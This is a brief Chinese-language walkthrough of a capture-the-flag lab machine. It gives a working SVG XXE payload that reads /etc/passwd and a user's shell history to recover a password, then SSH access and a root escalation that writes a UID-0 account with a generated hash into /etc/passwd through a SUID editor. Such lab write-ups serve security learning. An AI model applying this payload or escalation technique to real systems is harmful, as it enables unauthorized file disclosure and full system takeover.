主机层面扫描:
22 和 3306 端口
3306 端口默认是MySQL端口,但是这里尝试爆破报错,最后通http访问发现非MySQL协议,而是一个http的服务
http的协议我们进行目录枚举下
枚举到一个长传的点,我们试试访问下
http://10.10.202.10:3306/upload.html
上传反向shell试试
通过前段绕过svg的格式文件,上传PHP shell 失败,错误页面。
这里使用svg xxe 注入 漏洞
https://insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/
payload:
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">&xxe;</svg>
以上内容保存到svgxxe.svg 文件中,尝试上传下
右键源代码查看
这里我们尝试读取下用户的历史命令,尝试看看是够有用户凭证啥的
这里就读取: /home/employee/.ash_history
└──╼ $sudo useradd -h | grep "-p"
sudo: unable to resolve host HACK404: Name or service not known
-p, --password PASSWORD encrypted password of the new account
所以这里的-p参数后面的字符串,应该是用户employee的密码
SSHD登陆
进行提权操作
minuv2:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/micro
/bin/bbsuid
minuv2:~$
这里经过尝试可以使用micro来编辑passwd文件,可以尝试提权操作。
本地生成密码对应的hash值
$openssl passwd -1 -salt hack404 hack404123
$1$hack404$FyYmBA.v/Hgs60rVCMtiN1
增加hash值到passwd文件
hack404:$1$hack404$FyYmBA.v/Hgs60rVCMtiN1:0:0:root:root:/bin/ash
增加之后,按ESC键,然后输入y,保存名称为: /etc/passwd
完结!